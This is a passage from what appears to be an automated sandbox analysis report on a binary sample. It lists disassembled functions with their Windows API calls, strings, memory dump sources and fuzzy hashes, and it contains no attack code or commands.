                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: f895e1cb537513f1d80e9baa4763778f9b559211ee3a1b526166164a4fd32616
                                                  • Instruction ID: 9d9a4b41da3daf3cdc487dec8005b54da7583c0ab07e321717e7ece7dea908d0
                                                  • Opcode Fuzzy Hash: f895e1cb537513f1d80e9baa4763778f9b559211ee3a1b526166164a4fd32616
                                                  • Instruction Fuzzy Hash: EB018875A411087BCB14FBA4C992EFF73A8FF55700F140116B952A7281EA11AF089662
                                                  Function 008D9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 008D92D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 624940a0eabf024f9b30689e406ba337cc19e0cce5bb182f0e1045e1ac25d5aa
                                                  • Instruction ID: c3f3563ddff2a0bccfa8ba4cfe7850a188941f35e67a77ca6ea5f598dea1bc96
                                                  • Opcode Fuzzy Hash: 624940a0eabf024f9b30689e406ba337cc19e0cce5bb182f0e1045e1ac25d5aa
                                                  • Instruction Fuzzy Hash: 6501A771A8110877CB04FAA4C982EFF77ACFF11700F240216B952E3281DB619F089672
                                                  Function 008E51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp
                                                  • String ID: #32770
                                                  • API String ID: 2292705959-463685578
                                                  • Opcode ID: 32bbae155715300a76ae697990138609c402f1d569504755b6d2bac207b1c1c4
                                                  • Instruction ID: 4e44c615ecb08de06a035f6cd8698e41521db2cfe0e428f25dfbdda11a26c415
                                                  • Opcode Fuzzy Hash: 32bbae155715300a76ae697990138609c402f1d569504755b6d2bac207b1c1c4
                                                  • Instruction Fuzzy Hash: D5E0D17390432D1BE7209A999C45F97F7ACFF56771F000167FD14D7050D6609A458BD1
                                                  Function 008D81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008D81CA
                                                    • Part of subcall function 008A3598: _doexit.LIBCMT ref: 008A35A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Message_doexit
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 1993061046-4017498283
                                                  • Opcode ID: d5db6197b6d9d7565093e1d5d6d34e46501714ffe08ee7d7e8ec9e4ef6dd81d7
                                                  • Instruction ID: 3dc44904de06decd5431954904960159419bd29fa18a705dc0642bc77b9fb6a6
                                                  • Opcode Fuzzy Hash: d5db6197b6d9d7565093e1d5d6d34e46501714ffe08ee7d7e8ec9e4ef6dd81d7
                                                  • Instruction Fuzzy Hash: 7DD05B333C572D36E61532AC6C0BFC67648DB05B55F004016FB08D59D38DD295D142DA
                                                  Function 008BB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008BB564: _memset.LIBCMT ref: 008BB571
                                                    • Part of subcall function 008A0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00945158,00000000,00945144,008BB540,?,?,?,0088100A), ref: 008A0B89
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,0088100A), ref: 008BB544
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0088100A), ref: 008BB553
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008BB54E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                  • API String ID: 3158253471-631824599
                                                  • Opcode ID: 4ee0fd7f7a764f9a17dc48eef3dc34594190be57f0764d1a8bad311e5cbbdf7d
                                                  • Instruction ID: 52c460caf7609b61b02a14f4c4cb6e798336a50e8f127e1fe0c0e940173e39ac
                                                  • Opcode Fuzzy Hash: 4ee0fd7f7a764f9a17dc48eef3dc34594190be57f0764d1a8bad311e5cbbdf7d
                                                  • Instruction Fuzzy Hash: 81E039B02147118ED330DF28E5047827AE0FF00754F00892CE456C3750D7B4E508DB62